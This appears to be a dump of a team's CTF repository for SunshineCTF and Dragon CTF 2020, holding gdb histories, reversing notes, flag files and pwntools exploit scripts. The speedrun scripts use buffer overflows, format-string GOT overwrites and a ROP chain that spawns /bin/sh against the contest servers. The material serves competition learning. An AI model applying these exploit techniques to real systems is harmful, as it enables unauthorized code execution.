--------------------------------------------------------------------------------
1 | # Dragon CTF 2020
2 |
3 | **Rank**: 107 / 539
4 |
5 | ## Solves
6 | - [Bit Flip 1](https://github.com/qxxxb/ctf/tree/master/2020/dragon_ctf/bit_flip/1)
7 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/README.md:
--------------------------------------------------------------------------------
1 | # SunshineCTF 2020
2 |
3 | **Site**: https://sunshinectf.org/
4 |
5 | **Rank**: 17 / 742
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/.gdb_history:
--------------------------------------------------------------------------------
1 | checksec
2 | start
3 | ni
4 | q
5 | start
6 | ni
7 | ni
8 | ni
9 | ni
10 | nearpc
11 | nearpc 50
12 | search flag
13 | search sun
14 | search time
15 | search sink
16 | ls
17 | ctx
18 | si
19 | ni
20 | ni
21 | disassemble check_flag
22 | q
23 | start
24 | ni
25 | p f
26 | p &f
27 | hexdump f
28 | q
29 | main
30 | start
31 | nextcall
32 | si
33 | ni
34 | ni
35 | ni
36 | x al
37 | x $al
38 | p $al
39 | ? 0x36
40 | ni
41 | ni
42 | ni
43 | ni
44 | ni
45 | q
46 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/hotel/a.out
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/hotel_key_puzzle:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/hotel/hotel_key_puzzle
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/key.txt:
--------------------------------------------------------------------------------
1 | sun{b3llh0p5-runn1n6-qu1ckly}
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/main.py:
--------------------------------------------------------------------------------
1 | def inc(c, d):
2 | return chr(ord(c) + d)
3 |
4 | def dec(c, d):
5 | return chr(ord(c) - d)
6 |
7 | arg1 = ["+"] * 29
8 |
9 | arg1[0x13] = '6'
10 | arg1[0x10] = 'n'
11 | arg1[0xd] = 'r'
12 | arg1[0x14] = dec('%', -8)
13 | arg1[0xf] = 'n'
14 | arg1[10] = 'p'
15 | arg1[0x10] = dec('u', 7)
16 | arg1[3] = '{'
17 | arg1[0x13] = '6'
18 | arg1[0x15] = 'q'
19 | arg1[2] = 'n'
20 | arg1[0] = 's'
21 | arg1[7] = 'l'
22 | arg1[0xe] = 'u'
23 | arg1[0xc] = dec(',', -1)
24 | arg1[4] = 'b'
25 | arg1[6] = dec('o', 3)
26 | arg1[0x12] = 'n'
27 | arg1[0x16] = dec('z', 5)
28 | arg1[0x17] = '1'
29 | arg1[1] = 'u'
30 | arg1[5] = dec('8', 5)
31 | arg1[8] = dec('f', 3 + 4 - 9)
32 | arg1[0xb] = dec('<', 7)
33 | arg1[0x11] = dec('-', 6 - 8 + ord('\t') - 5 - 6)
34 | arg1[9] = dec(',', 1 + 2 - 7)
35 | arg1[0x18] = dec('Y', -10 - 8 + ord('\b'))
36 | arg1[0x19] = dec('w', 5 + ord('\a'))
37 | arg1[0x1a] = dec('m', -6 + ord('\a'))
38 | arg1[0x1b] = 'y'
39 | arg1[0x1c] = '}'
40 |
41 | for i, c in enumerate(arg1):
42 | print(i, c)
43 |
44 | print()
45 |
46 | key = "".join(arg1)
47 | print(key)
48 |
49 | with open('key.txt', 'w') as f:
50 | f.write(key)
51 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/notes.md:
--------------------------------------------------------------------------------
1 | length: 0x1d = 29
2 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/hotel/test.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | int main(int argc, char *argv[])
4 | {
5 | char x = 'a';
6 | char f = '\a';
7 | x = x + f;
8 | printf("%c\n", x);
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/LicenseChecker.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/LicenseChecker.peg
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/PEGASUS_User_Guide.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/PEGASUS_User_Guide.peg
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/bof.peg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/bof.peg
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/core.sh.25065:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/core.sh.25065
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/dump:
--------------------------------------------------------------------------------
1 | fac4: 0000 0000 0000 0000 ebc1 ebc1 ebc1 ebc1 ................
2 | fad4: ebc1 ebc1 ebc1 ebc1 ebc1 ebc1 eb00 8080 ................
3 | fae4: 8080 8080 8080 8080 8080 8080 8080 8080 ................
4 | faf4: 8080 80c0 f0e5 e7ae e5e1 7200 ..........r.
5 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/dump1:
--------------------------------------------------------------------------------
1 | fac4: 672e 6561 f2c0 f0e5 ebc1 ebc1 ebc1 ebc1 g.ea............
2 | fad4: ebc1 ebc1 ebc1 ebc1 ebc1 ebc1 eb00 8080 ................
3 | fae4: 8080 8080 8080 8080 8080 8080 8080 8080 ................
4 | faf4: 8080 80c0 f0e5 e7ae e5e1 7200 ..........r.
5 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/flag.txt:
--------------------------------------------------------------------------------
1 | sun{fart}
2 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/libpegasus_ear.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/libpegasus_ear.so
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_brute_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_brute_checker.so
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_dev_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_dev_checker.so
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_pwn_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_pwn_checker.so
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/peg_rev_checker.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/peg_rev_checker.so
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/runpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/runpeg
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/scramble.py:
--------------------------------------------------------------------------------
1 | stack = [b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\x00', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\xc1', b'\xeb', b'\x00', b'\x00', b'\x00', b'\x00', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\xf2', b'\x72', b'\x00']
2 | print(stack)
3 |
4 | rv = 30 # &email[0]
5 | r3 = 0 # &license[0]
6 |
7 | r4 = rv
8 | r5 = rv
9 |
10 | # ...
11 |
12 | r6 = 58
13 |
14 | r5 = r4
15 | r7 = 0
16 | while True:
17 | rv = r3 + 0x7 + r7
18 | r4 = stack[r5]
19 | tmp = stack[rv]
20 | tmp = bytes([tmp[0] & r4[0]])
21 | stack[rv] = tmp
22 | r5 += 1
23 | r7 += 1
24 | if r5 <= r6:
25 | break
26 |
27 | rv = 0
28 | r7 = 0
29 |
30 | print(stack)
31 |
32 | while True:
33 | r5 = r3 + r7
34 | r5 = stack[r5]
35 | # print(stack[r5])
36 | print(rv)
37 | r7 += 1
38 | if r7 >= 0x7:
39 | break
40 |
41 | print(rv)
42 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/scratch.md:
--------------------------------------------------------------------------------
1 | b 0x294
2 | aaaabaaacaaadaaaeaaafaaagaaahaAAAABAAACAAADAAAEAAAFAAAGAAAHA
3 | zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁkÁ
4 | zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzkAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
5 |
6 | Finally the license key works!
7 | rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrkAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
8 |
9 | rrrrrrrrrrrrrrrrrrrrrrrrrrrrr
10 | pancakes_dont_taste_bad_maybe
11 | rrrrrrrrrrrrrrrrrrrrrrrrrråár
12 | kAkAkAkAkAkAkAkAkAkAkAkAkAkAkA
13 |
14 | hexdump r 0xfae2 30
15 |
16 | ord('A') - 0xC1 = -128
17 | ord('1') - 0xB1 = -128
18 | ord('1') + 128 = 0xb1
19 |
20 | We need
21 | ord(x) + 128 > 235
22 | ord(x) > 235 - 128
23 | x > chr(235 - 128)
24 |
25 | AAAABAAACAAADAAAEAAAFAAAGAAAHA
26 |
27 | cm = c | 0x80
28 | r6 = cm & 0x7f
29 | r6 = r6 - 0x41
30 |
31 | - How did the null byte get set in recv_str?
32 | - Answer: It is initialized with null bytes
33 | - Can we abuse BRA, RD, DC, RV to return where we want?
34 | - Write 0x80 in the email
35 |
36 | - recv_str has an error with newline: 1 byte can bypass the 0x80 OR
37 | - But using this makes the length 29 instead of 30
38 | - What about the OR stuff from check_license_key?
39 |
40 | 0xfae2 + 30 == 0xfb00
41 |
42 | 0000-0100: R=00 W=00 X=00 fault=0000
43 | 0100-0300: R=12 W=00 X=12 fault=0000
44 | 0300-EA00: R=00 W=00 X=00 fault=0000
45 | EA00-EB00: R=00 W=00 X=00 fault=F000
46 | EB00-FB00: R=02 W=02 X=00 fault=0000
47 | FB00-FC00: R=00 W=00 X=00 fault=FB00
48 | FC00-FFFF: R=FC W=FC X=00 fault=0000
49 |
50 | 0xfb00 is right at the start of a new page
51 | Also, why is FB00 set as the fault handler?
52 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/pegasus/submitpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/pegasus/submitpeg
--------------------------------------------------------------------------------
/2020/sunshine_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/rank.png
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | ni
4 | cyclic 256
5 | ni
6 | telescope $rbp-4
7 | ctx
8 | x $rbp-4
9 | nearpc
10 | ls
11 | q
12 | b main
13 | run
14 | q
15 | b main
16 | run < payload
17 | ni
18 | p rbp
19 | p $rbp
20 | c
21 | run
22 | ni
23 | cyclic 256
24 | ni
25 | q
26 | start
27 | main
28 | ni
29 | p $rbp-4
30 | x $rbp-4
31 | cyclic -l 0x61616170
32 | q
33 | disassemble main
34 | q
35 | ctx
36 | start
37 | main
38 | ctx
39 | ni
40 | ni
41 | ni
42 | ni
43 | ni
44 | ni
45 | disasm main
46 | diassemble main
47 | disassemble main
48 | q
49 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/chall_00:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/0/chall_00
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/main.py:
--------------------------------------------------------------------------------
1 | import pwn
2 |
3 | pwn.context.arch = 'amd64'
4 | sh = pwn.remote('chal.2020.sunshinectf.org', 30000)
5 | payload = pwn.cyclic(60) + pwn.p64(0xfacade)
6 |
7 | with open('payload', 'wb') as f:
8 | f.write(payload)
9 |
10 | sh.sendline(payload)
11 | sh.interactive()
12 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/0/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/0/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | checksec
3 | ni
4 | main
5 | ni
6 | ni
7 | ni
8 | ni
9 | ni
10 | checksec
11 | zsh cyclic 256 | xsel -bi
12 | zsh
13 | start
14 | main
15 | ni
16 | ni
17 | ni
18 | ni
19 | nearpc 10
20 | nearpc 12
21 | nearpc 15
22 | ctx
23 | ni
24 | p $rbp-4
25 | p 4rbp-8
26 | p $rbp-8
27 | distance $rsp $rbp-8
28 | distance $rsp $rbp-4
29 | x $rbp-4
30 | x $rbp-8
31 | c
32 | c
33 | start
34 | main
35 | nextcall
36 | ni
37 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
38 | q
39 | start
40 | main
41 | ni
42 | ni
43 | ni
44 | x $rbp-4
45 | cyclic 0x61616178
46 | cyclic -l 0x61616178
47 | x $rbp-8
48 | cyclic -l 0x61616177
49 | q
50 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/chall_01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/1/chall_01
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/main.py:
--------------------------------------------------------------------------------
1 | import pwn
2 |
3 | pwn.context.arch = 'amd64'
4 | sh = pwn.remote('chal.2020.sunshinectf.org', 30001)
5 | # sh = pwn.process('./chall_01')
6 | p1 = "A" * 13
7 | payload = pwn.cyclic(88) + pwn.p32(0xfacade) + pwn.p32(0xfacade)
8 |
9 | # with open('payload', 'wb') as f:
10 | # f.write(payload)
11 |
12 | sh.sendline(p1)
13 | sh.sendline(payload)
14 | sh.interactive()
15 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/1/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/1/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/.gdb_history:
--------------------------------------------------------------------------------
1 | pwndbg func
2 | pwndbg sym
3 | start
4 | main
5 | ni
6 | disassemble main
7 | ni
8 | ni
9 | ni
10 | ni
11 | cyclic 19
12 | ni
13 | ni
14 | si
15 | ni
16 | checksec
17 | ni
18 | ni
19 | ni
20 | ni
21 | ni
22 | ni
23 | ni
24 | ni
25 | ni
26 | c
27 | q
28 | start
29 | main
30 | ni
31 | ni
32 | ni
33 | si
34 | ni
35 | ni
36 | ni
37 | ni
38 | ni
39 | p win
40 | c
41 | b main
42 | q
43 | b vuln
44 | run < payload
45 | nextcall
46 | ni
47 | ni
48 | si
49 | ni
50 | telescope $ebp+8
51 | p $ebp+8
52 | x $ebp+8
53 | search aaa
54 | ctx
55 | distance 0xffffc5fe $ebp+8
56 | q
57 | b main
58 | q
59 | b vuln
60 | run < payload
61 | ni
62 | ni
63 | ni
64 | ni
65 | ni
66 | ni
67 | p $ebp+8
68 | hex $esp
69 | cyclic -l aapa
70 | p $ebp+8
71 | telescope $ebp+8
72 | ctx
73 | hex
74 | q
75 | b vuln
76 | run < payload
77 | ni
78 | ni
79 | p $ebp+4
80 | x $ebp+4
81 | ds $ebp+4
82 | cyclic -l aaaa
83 | q
84 | b vuln
85 | run < payload
86 | nextcall
87 | ret
88 | return
89 | q
90 | b vuln
91 | run < payload
92 | nextcall
93 | ni
94 | q
95 | b vuln
96 | run < payload
97 | ni
98 | si
99 | ni
100 | p $ebp+8
101 | x $ebp+8
102 | hex $ebp+8
103 | hex $ebp
104 | q
105 | b vuln
106 | run < payload
107 | nextcall
108 | ni
109 | q
110 | b vuln
111 | run < payload
112 | nextcall
113 | ni
114 | si
115 | ni
116 | p $ebp+8
117 | x $ebp+8
118 | ni
119 | ni
120 | ni
121 | q
122 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/chall_10:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/10/chall_10
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | sh = remote('chal.2020.sunshinectf.org', 30010)
4 | # sh = process('./chall_10')
5 |
6 | p1 = "abc"
7 |
8 | ret_padding = cyclic_find(0x61716161)
9 | win_addr = 0x80484d6
10 | payload = cyclic(ret_padding) + p32(win_addr) + p32(0) + p32(0xdeadbeef)
11 |
12 | # 0xffffc5fe
13 |
14 | with open('payload', 'w') as f:
15 | f.write(p1 + '\n')
16 |
17 | with open('payload', 'ab') as f:
18 | f.write(payload)
19 |
20 | sh.recvline()
21 | sh.sendline(p1)
22 |
23 | sh.sendline(payload)
24 | sh.interactive()
25 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/notes.md:
--------------------------------------------------------------------------------
1 | fgets:
2 | s = ebp - 0x1c
3 | n = 0x13 (19)
4 |
5 | ► 0x8048531 ret <0x61716161>
6 |
7 | $1 = {} 0x80484d6
8 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/10/payload:
--------------------------------------------------------------------------------
1 | abc
2 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaք ᆳ�
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/chall_11:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/chall_11
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | # sh = remote('chal.2020.sunshinectf.org', 30011)
4 | sh = process('./chall_11')
5 |
6 | p1 = 'abc'
7 |
8 | win = 0x80484e6
9 | win1 = win & 0xffff
10 | win2 = (win & 0xffff0000) >> (4 * 4)
11 |
12 | fflush = 0x8049918
13 | fflush1 = fflush
14 | fflush2 = fflush1 + 2
15 |
16 | payload = b'AAAA' + p32(fflush2) + p32(fflush1)
17 | n_sent = len(payload)
18 |
19 | payload += "%{}x".format(win2 - n_sent).encode() + b'%7$hn'
20 | n_sent = win2
21 |
22 | payload += "%{}x".format(win1 - n_sent).encode() + b'%8$hn'
23 |
24 | with open('payload', 'w') as f:
25 | f.write(p1 + '\n')
26 |
27 | with open('payload', 'ab') as f:
28 | f.write(payload)
29 |
30 | sh.recvline()
31 | sh.sendline(p1)
32 |
33 | sh.sendline(payload)
34 | sh.interactive()
35 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/11/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/11/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | disassemble main
4 | disassemble vuln
5 | ni
6 | main
7 | ni
8 | p main
9 | ni
10 | p win
11 | distance win main
12 | distance &win &main
13 | ni
14 | ni
15 | ni
16 | si
17 | ni
18 | ABCD%7$x
19 | ni
20 | ni
21 | ni
22 | ni
23 | ni
24 | c
25 | q
26 | got
27 | start
28 | got
29 | q
30 | start
31 | got
32 | distance 0x565569fc &main
33 | p main
34 | p win
35 | p main
36 | distance &main &win
37 | distaince [0x565569fc] fflush@GLIBC_2.0 -> 0xf7e39350 (fflush) ◂— push ebp
38 | distance 0x565569fc &main
39 | distance &main 0x565569fc
40 | exit
41 | q
42 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/chall_12:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/12/chall_12
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | sh = remote('chal.2020.sunshinectf.org', 30012)
4 | # sh = process('./chall_12')
5 |
6 | p1 = 'abc'
7 |
8 | s = sh.recvline().decode('ascii').split()
9 | main_addr = int(s[-1], 0)
10 | print('main:', hex(main_addr))
11 | win = main_addr - 0x8c
12 | print('win:', hex(win))
13 |
14 | win1 = win & 0xffff
15 | win2 = (win & 0xffff0000) >> (4 * 4)
16 |
17 | # [0x565569fc] fflush@GLIBC_2.0 -> 0xf7e39350 (fflush) ◂— push ebp
18 | fflush = main_addr + 0x13c3
19 | print('fflush:', hex(fflush))
20 |
21 | fflush1 = fflush
22 | fflush2 = fflush1 + 2
23 |
24 | payload = b'AAAA' + p32(fflush2) + p32(fflush1)
25 | n_sent = len(payload)
26 |
27 | payload += "%{}x".format(win2 - n_sent).encode() + b'%7$hn'
28 | n_sent = win2
29 |
30 | payload += "%{}x".format(win1 - n_sent).encode() + b'%8$hn'
31 |
32 | print(payload)
33 |
34 | with open('payload', 'w') as f:
35 | f.write(p1 + '\n')
36 |
37 | with open('payload', 'ab') as f:
38 | f.write(payload)
39 |
40 | sh.sendline(p1)
41 |
42 | sh.sendline(payload)
43 | sh.interactive()
44 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/12/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | ni
4 | ni
5 | ni
6 | ni
7 | si
8 | disassemble vuln
9 | ni
10 | ni
11 | ni
12 | p $ebx
13 | telescope $ebx
14 | distance $esp $ebp
15 | ni
16 | ni
17 | p win
18 | p vuln
19 | disassemble systemFunc
20 | checksec
21 | ls
22 | q
23 | b vuln
24 | run
25 | ni
26 | cyclic 256
27 | ni
28 | info frame
29 | q
30 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/chall_13:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/13/chall_13
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/13/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | sh = remote('chal.2020.sunshinectf.org', 30013)
4 | # sh = process('./chall_13')
5 |
6 | p1 = 'abc'
7 |
8 | # ► 0x8048528 ret <0x61716161>
9 | padding = cyclic_find(0x61716161)
10 | print('padding:', padding)
11 |
12 | ret_addr = 0x080484d6
13 | payload = cyclic(padding) + p32(ret_addr)
14 |
15 | with open('payload', 'w') as f:
16 | f.write(p1 + '\n')
17 |
18 | with open('payload', 'ab') as f:
19 | f.write(payload)
20 |
21 | sh.recvline()
22 | sh.sendline(p1)
23 |
24 | sh.sendline(payload)
25 | sh.interactive()
26 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/notes.md:
--------------------------------------------------------------------------------
1 | ► 0x8048528 ret <0x61716161>
2 |
3 | Dump of assembler code for function systemFunc:
4 | 0x080484d6 <+0>: push ebp
5 | 0x080484d7 <+1>: mov ebp,esp
6 | 0x080484d9 <+3>: push ebx
7 | 0x080484da <+4>: sub esp,0x4
8 | 0x080484dd <+7>: call 0x8048582 <__x86.get_pc_thunk.ax>
9 | 0x080484e2 <+12>: add eax,0x1b1e
10 | 0x080484e7 <+17>: sub esp,0xc
11 | 0x080484ea <+20>: lea edx,[eax-0x19f0]
12 | 0x080484f0 <+26>: push edx
13 | 0x080484f1 <+27>: mov ebx,eax
14 | 0x080484f3 <+29>: call 0x8048390
15 | 0x080484f8 <+34>: add esp,0x10
16 | 0x080484fb <+37>: nop
17 | 0x080484fc <+38>: mov ebx,DWORD PTR [ebp-0x4]
18 | 0x080484ff <+41>: leave
19 | 0x08048500 <+42>: ret
20 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/payload:
--------------------------------------------------------------------------------
1 | abc
2 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaք
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/README.md:
--------------------------------------------------------------------------------
1 | https://quentinmeffre.fr/pwn/2017/01/25/easy_method.html
2 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/chall_14:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/chall_14
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30014)
6 | # sh = process('./chall_14')
7 |
8 | p1 = 'abc'
9 |
10 | padding = cyclic_find(0x62616162)
11 | print('padding:', padding)
12 |
13 | data = 0x06b90e0
14 | p = cyclic(padding)
15 | p += p64(0x0410263) # pop rsi; ret;
16 | p += p64(data) # address of data section
17 | p += p64(0x04158f4) # pop rax; ret;
18 | p += b'/bin//sh'
19 | p += p64(0x047f401) # mov qword ptr [rsi], rax; ret;
20 | p += p64(0x0400696) # pop rdi; ret;
21 | p += p64(data) # address of data section
22 | p += p64(0x044c0a9) # pop rdx; pop rsi; ret;
23 | p += p64(0) # set rdx to 0
24 | p += p64(0) # set rsi to 0
25 | p += p64(0x04158f4) # pop rax; ret;
26 | p += p64(59) # set rax to 59
27 | p += p64(0x0474e35) # syscall; ret;
28 |
29 | with open('payload', 'w') as f:
30 | f.write(p1 + "\n")
31 |
32 | with open('payload', 'ab') as f:
33 | f.write(p)
34 |
35 | # Doesn't print line on remote for some reason
36 | # sh.recvline()
37 | sh.sendline(p1)
38 |
39 | sh.sendline(p)
40 | sh.interactive()
41 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/main_srop.py:
